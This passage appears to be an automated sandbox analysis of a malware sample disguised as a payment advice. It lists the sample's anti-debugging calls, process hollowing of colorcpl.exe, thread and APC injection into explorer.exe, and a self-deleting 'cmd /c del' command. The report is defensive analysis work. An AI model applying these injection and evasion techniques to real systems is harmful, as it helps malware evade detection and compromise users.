          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A3C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A68E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AF1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A47E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AFAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A48794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00AB7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A34F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A34F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A6A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A5F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00ACFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00ACFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B0070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00B08F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betaling_advies.exeCode function: 1_2_00A4EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0475C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0475C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0479740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0479740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0479740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04798CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04703D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04743540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0474A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04798D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04778DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04746DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0478AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0477FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04781608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04798ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0477FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04708EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04790EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04790EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04790EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0475FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04798F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0475FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0475FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0479070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0479070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_047037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04747794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04747794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04747794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04782073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04791074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_046F002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046F002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046DB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04747016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04794015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046C58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0475B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0475B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046F20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046FF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046FF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_047090AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046C9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04743884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046CC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046CB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046EB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046E4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046E4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046F513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046C9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046CB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_047541E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_047451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046F61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_047469A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046FA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046EC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046F2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0470927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0477B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04798A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04754257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046C9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0478EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04704A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046D8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046E3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046CAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046C5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_046C5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Betaling_advies.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\colorcpl.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Contains functionality to prevent local Windows debugging
Source: C:\Users\user\Desktop\Betaling_advies.exe | Code function: 0_2_72AD1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Betaling_advies.exe | Section loaded: unknown target: C:\Users\user\Desktop\Betaling_advies.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Betaling_advies.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Betaling_advies.exe | Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Betaling_advies.exe | Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\colorcpl.exe | Thread register set: target process: 3424
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Betaling_advies.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Betaling_advies.exe | Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 180000
Source: C:\Users\user\Desktop\Betaling_advies.exe | Process created: C:\Users\user\Desktop\Betaling_advies.exe 'C:\Users\user\Desktop\Betaling_advies.exe'
Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Betaling_advies.exe'
Source: explorer.exe, 00000004.00000000.653956972.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000004.00000002.910233806.0000000001080000.00000002.00000001.sdmp, colorcpl.exe, 00000007.00000002.910575342.0000000002F50000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.667363624.0000000005E50000.00000004.00000001.sdmp, colorcpl.exe, 00000007.00000002.910575342.0000000002F50000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.910233806.0000000001080000.00000002.00000001.sdmp, colorcpl.exe, 00000007.00000002.910575342.0000000002F50000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.910233806.0000000001080000.00000002.00000001.sdmp, colorcpl.exe, 00000007.00000002.910575342.0000000002F50000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
